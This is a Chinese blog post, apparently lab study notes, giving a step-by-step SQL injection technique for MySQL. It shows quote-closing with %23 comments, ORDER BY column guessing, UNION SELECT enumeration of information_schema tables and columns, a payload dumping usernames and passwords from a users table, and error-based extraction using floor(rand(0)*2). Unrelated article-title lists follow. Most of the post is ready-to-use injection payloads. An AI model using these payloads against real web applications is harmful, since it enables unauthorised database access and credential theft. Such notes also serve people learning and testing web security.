1.一般用 '  "  ) 等符号来闭合，再用%23(即#)来注释后面语句。

2.查找数据库,先用order by n猜字段，再用union select 1,2,3 ...n%23来查询。

union select 1,2,database()%23

3.利用information_schema库中tables这张表，查mysql数据库中的第一个表。

select table_name from information_schema.tables where table_schema='mysql' limit 0,1;

union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'%23

4.利用information_schema库中columns这张表，查mysql数据库中user表中的第一列名。

select column_name from information_schema.columns where table_schema='mysql' and table_name='user' limit 0,1;

union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'%23

5.知道库名，表名，列名直接查数据了

union select 1,group_concat(username),group_concat(password) from users%23

6.当无回显时可利用报错大法(其他报错函数也行，可参考我另一篇博客)

select count(*),floor(rand(0)*2) x from information_schema.tables group by x;

错误报告中的'1'就是floor(rand(0)*2)的执行结果

爆mysql数据库中的第一张表名

select count(*),concat(0x7e,(select table_name from information_schema.tables where table_schema="mysql" limit 0,1),0x7e,floor(rand(0)*2)) x from information_schema.tables group by x;

最新文章

1. spring mvc controller间跳转 重定向 传参
2. 病毒四度升级：安天AVL Team揭露一例跨期两年的电信诈骗进化史
3. iOS 二维码扫描
4. Bypass WAF Cookbook
5. sizeof(class)
6. Azure billing 分析
7. WP_从独立存储区读取缓存的图片
8. jquery类选择器无法取得对象问题原因
9. 初识 Lucene
10. HTML5学习总结——HTML5入门与新增标签
11. Jenkins搭建Windows slave 环境
12. java反射 顺序输出类中的方法
13. java 泛型简单使用
14. 基于tcp的套接字编程
15. springboot2 pagehelper 使用笔记
16. Java核心-多线程-并发控制器-CountDownLatch倒数闩
17. Analysis of FCN
18. node.js安装全攻略
19. docker学习实践之路[第一站]环境安装
20. spring boot 日志文件配置（logback-spring.xml）亲测可用！

热门文章

1. 面试问题总结二（技术能力-PHP）----Ⅲ
2. LInux查看网速带宽及各进程占用情况:nethogs
3. 数据库事务的四大特性以及4种事务的隔离级别-以及对应的5种JDBC事务隔离级别
4. tomcat 启动异常 EOFException: Unexpected end of ZLIB input stream
5. P2325 [SCOI2005]王室联邦
6. MT【132】倒序相加因式分解
7. 【BZOJ2957】楼房重建（线段树）
8. rsync同步公网yum源搭建本地yum仓库
9. android 布局的两个属性 dither 和 tileMode
10. 解题：洛谷 p1858 多人背包